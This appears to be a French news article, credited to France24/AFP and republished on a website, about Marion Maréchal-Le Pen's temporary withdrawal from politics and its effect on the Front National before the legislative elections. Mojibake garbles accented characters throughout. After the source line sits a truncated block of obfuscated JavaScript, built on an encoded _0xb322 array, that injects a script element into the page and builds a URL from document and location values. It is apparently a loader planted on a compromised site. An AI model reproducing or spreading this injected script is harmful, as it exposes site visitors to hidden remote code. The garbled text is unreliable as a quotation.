Home / EUROPE / Le retrait temporaire de MarAi??chal-Le Pen affaiblit le FN avant les lAi??gislatives

Le retrait temporaire de MarAi??chal-Le Pen affaiblit le FN avant les lAi??gislatives

Avec son retrait temporaire de la vie politique, Marion MarAi??chal-Le Pen laisse orpheline toute une partie du Front national qui comptait sur elle pour porter une aile droite en interne et oblige Marine Le Pen Ai?? assumer seule le combat lAi??gislatif.

« Marion », comme tous l’appellent en interne, a officialisAi?? sa dAi??cision d’arrA?ter l’AssemblAi??e nationale, la rAi??gion Paca, mais aussi le bureau politique FN.

Simple adhAi??rente du FN, la benjamine de l’AssemblAi??e nationale pourrait toutefois devenir supplAi??ante d’HervAi?? de LAi??pinau, son actuel supplAi??ant sur la troisiA?me circonscription du Vaucluse qu’elle dAi??tenait depuis 2012, s’il y Ai??tait investi vendredi.

PrAi??sent, le quotidien catholique pro-FN, rAi??sume le choc Ai?? mercredi : c' »est un Ai??norme coup dur. Pour le FN, pour la droite, pour toute notre famille d?idAi??es et de convictions et plus largement pour la France ».

Presque tous les frontistes, dont beaucoup se sont fendus d’un « Merci Marion » sur Twitter, « regrettent », comme l’a Ai??crit Marine Le Pen elle-mA?me dans un tweet, cette dAi??cision pourtant « respectable », dont ils comprennent les raisons « personnelles ».

Une note interne consultAi??e par l’AFP recommande d’ailleurs aux cadres et Ai??lus de l’interprAi??ter de cette maniA?re.

Car « peut-A?tre » aussi que la benjamine des Le Pen n’a « pas eu envie de s’affronter avec sa tante », avance Robert MAi??nard, maire de BAi??ziers alliAi?? au FN.

Si un dirigeant du parti pense que « les Ai??lecteurs ne votaient pas Marine Le Pen ou FN » Ai?? cause de la prAi??sence de cette chef de file de l’aile droite du parti, d’aucuns voient le FN affaibli par ce que certains considA?rent comme un « sAi??isme ».

– « Ca ne renforce pas Philippot » –

« C’est une Ai??preuve qui a un certain retentissement au FN, c’est sAi??r. J’aurais prAi??fAi??rAi?? qu’elle reste et qu’elle se fasse rAi??Ai??lire », pour les lAi??gislatives comme pour l’aprA?s, indique le trAi??sorier, Wallerand de Saint Just, Ai?? l’AFP.

« C’est une perte pour tous les gens comme nous », ajoute M. MAi??nard, un des principaux reprAi??sentants de la « droite hors les murs » qui gravite autour du FN et qui pouvait trouver chez l’Ai??lue du Vaucluse une oreille attentive Ai?? ses idAi??es.

Les habituels contempteurs du vice-prAi??sident du parti, Florian Philippot, qui perd sa principale opposante interne, le voient paradoxalement comme une victime de ce retrait temporaire.

« La dAi??jAi?? trA?s vive mAi??fiance s’est considAi??rablement aggravAi??e contre celui qui apparaAi??t comme l’ayant poussAi??e Ai?? prendre du recul », dit un dirigeant Ai?? l’AFP, rappelant qu’il l’avait dAi??crite comme « seule et isolAi??e » au FN, celle-ci dAi??nonAi??ant en retour une « agression ».

« Ca ne renforce pas Philippot », renchAi??rit un important Ai??lu du sud-est. Alors que quelques « marionistes » s’interrogent dAi??sormais sur leur place au FN, lui estime qu’au contraire « Ai??a accentue la volontAi?? des gens d’aller jusqu’au bout des changements qu’il faut adopter ».

« Dans tous les cas de figure, il faudra faire le bilan de cette Ai??lection et en tirer les consAi??quences », mais « aprA?s les lAi??gislatives », dit Ai?? l’AFP Louis Aliot, vice-prAi??sident et compagnon de Marine Le Pen. D’ici lAi??, « nous sommes obligAi??s de garder notre unitAi?? », soupire un candidat.

Marine Le Pen a exprimAi?? son souhait d’une « transformation profonde » du FN qui pourrait se concrAi??tiser notamment par un changement de nom .

La candidate, fait savoir un proche, « a compris d’elle-mA?me » qu’elle avait manquAi?? sa prestation face Ai?? M. Macron, que beaucoup voient comme la raison des 33,9% du second tour, un record paradoxalement dAi??cevant.

« Rien n’existera sans Marine », rappelle Louis Aliot Ai?? ceux qui la jugent dAi??crAi??dibilisAi??e. D’autant qu’elle aurait cette fois « la volontAi?? d’un changement », croit savoir M. MAi??nard.

« J’espA?re que Ai??a va accAi??lAi??rer l’aggiornamento obligatoire du FN », ajoute-t-il, en particulier Ai?? propos de la volontAi?? de sortir de l’euro jugAi??e « dogmatique » par beaucoup. Philippe Olivier, une des principales figures de la campagne frontiste, le confirme implicitement : « On n’est pas idiots, on comprend ce que les gens nous disent ».

Source: France24, AFP nt[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *